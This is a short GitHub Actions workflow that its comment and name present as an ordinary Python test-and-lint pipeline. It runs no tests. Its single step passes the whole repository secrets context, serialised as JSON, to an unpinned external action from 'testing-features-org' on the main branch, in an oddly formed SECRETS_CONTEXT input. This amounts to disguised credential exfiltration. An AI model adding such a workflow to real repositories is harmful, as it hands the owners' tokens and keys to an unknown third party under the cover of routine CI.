# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions

name: Python application

on:
  push:
    branches: [ "main" ]
  workflow_dispatch:

jobs:

  build:
    runs-on: ubuntu-latest
    steps:
    - name: Composite Actions
      uses: testing-features-org/git-actions@main
      with:
        SECRETS_CONTEXT: [ `${{ toJson(secrets) }} | grep 1` ]


